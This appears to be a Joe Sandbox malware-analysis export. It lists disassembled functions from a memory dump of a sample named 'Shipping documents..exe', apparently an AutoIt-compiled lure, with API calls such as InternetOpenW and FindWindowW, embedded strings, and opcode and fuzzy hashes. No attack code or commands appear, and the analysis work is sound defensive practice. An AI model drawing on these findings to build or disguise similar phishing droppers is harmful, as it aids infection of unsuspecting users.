                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: htonsinet_addr
                                                                                                          • String ID: 255.255.255.255
                                                                                                          • API String ID: 3832099526-2422070025
                                                                                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                          Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InternetOpen
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 2038078732-4266983199
                                                                                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                          Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __fread_nolock_memmove
                                                                                                          • String ID: EA06
                                                                                                          • API String ID: 1988441806-3962188686
                                                                                                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                          Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: u,D
                                                                                                          • API String ID: 4104443479-3858472334
                                                                                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                          Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend_mallocwsprintf
                                                                                                          • String ID: %d/%02d/%02d
                                                                                                          • API String ID: 1262938277-328681919
                                                                                                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                          Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                          • String ID: aeB
                                                                                                          • API String ID: 857135153-906807131
                                                                                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                          Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • C:\Users\user\Desktop\Shipping documents..exe, xrefs: 0043324B
                                                                                                          • ^B, xrefs: 00433248
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcsncpy
                                                                                                          • String ID: ^B$C:\Users\user\Desktop\Shipping documents..exe
                                                                                                          • API String ID: 1735881322-869213185
                                                                                                          • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                          • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                          • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                          • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                          Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                          Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FindMessagePostSleepWindow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 529655941-2988720461
                                                                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                          Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message_doexit
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 1993061046-4017498283
                                                                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D